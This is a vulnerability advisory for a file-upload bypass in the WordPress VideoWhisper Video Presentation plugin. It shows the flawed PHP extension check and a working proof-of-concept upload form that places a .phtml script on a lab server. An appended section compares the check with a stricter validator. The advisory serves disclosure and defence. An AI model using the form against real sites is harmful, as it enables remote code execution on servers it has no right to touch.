WordPress VideoWhisper Video Presentation Plugin 3.31.17 /vp/vw_upload.php File Upload Vulnerability

2015-04-20T00:00:00
ID SSV:89141
Type seebug
Reporter Root
Modified 2015-04-20T00:00:00

Description

<ul><li>/vp/vw_upload.php</li></ul><pre class=""><?php
// Room name is taken from the request (POST overrides GET)
if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];

// File name is used as supplied by the client
$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");
sanV($room);
if (!$room) exit;

sanV($filename);
if (strstr($filename,".php")) $filename = ""; //duplicate php extension not allowed due to vulnerabilities of older web servers
if (!$filename) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

// Only the last four characters of the name are compared with the list
$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);

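?>loadstatus=1 </pre><p>When a user uploads a phtml file, $ext (the last four characters of the file name) is html, which is in the allowed list, and the name does not contain ".php", so the check is bypassed.</p><p>Upload the file using the following payload:</p><pre class=""><form action="http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php" method="post" enctype="multipart/form-data">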

<input type="file" name="vw_file">
<input type="text" name="room" value=".">
<button type="submit">Submit</button>

</form></pre><p><img alt="4626BA47-DBE7-490D-A1FA-38CA9A964340.png" src="https://images.seebug.org/@/uploads/1434332146034-4626BA47-DBE7-490D-A1FA-38CA9A964340.png" data-image-size="680,137"><br></p><p>Upload the file and assemble the file URL:</p><pre class="">http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/uploads/test.phtml </pre><p><img alt="1E1212DC-CA66-4A9C-9FCF-A1385A92EE00.png" src="https://images.seebug.org/@/uploads/1434332154409-1E1212DC-CA66-4A9C-9FCF-A1385A92EE00.png" data-image-size="674,267"><br></p>
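
The suffix comparison described above, next to a stricter check on the full extension, as an added example that is not the plugin's code or its fix. The function names and all sample file names other than test.phtml are constructed for illustration.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.

// The extension test from vw_upload.php, reduced to a predicate on the name.
function original_check(string $filename): bool {
    if (strstr($filename, ".php")) return false;
    $ext = strtolower(substr($filename, -4));
    $allowed = array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc",
        "docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");
    return in_array($ext, $allowed);
}

// Stricter variant: exactly one dot, a conservative character set, and the
// whole extension after that dot compared against bare extension names.
function hardened_check(string $filename): bool {
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/D', $filename, $m)) {
        return false;
    }
    // Same file types as the page's list, written without the dot.
    $allowed = array("swf","zip","rar","jpg","jpeg","png","gif","txt","doc",
        "docx","htm","html","pdf","mp3","flv","avi","mpg","ppt","pps");
    return in_array(strtolower($m[1]), $allowed, true);
}

// Constructed sample names; only test.phtml appears in the advisory.
$samples = array("slides.pdf", "photo.JPEG", "notes.html",
                 "a.php.jpg", "x.pht", "test.phtml");
foreach ($samples as $name) {
    printf("%-11s original=%-6s hardened=%s\n", $name,
        original_check($name) ? "accept" : "reject",
        hardened_check($name) ? "accept" : "reject");
}
```

Of these names, only test.phtml is accepted by the original check and rejected by the stricter one. Configuring the web server so that nothing under the uploads directory is executed as a script is a separate layer that does not depend on the file name check.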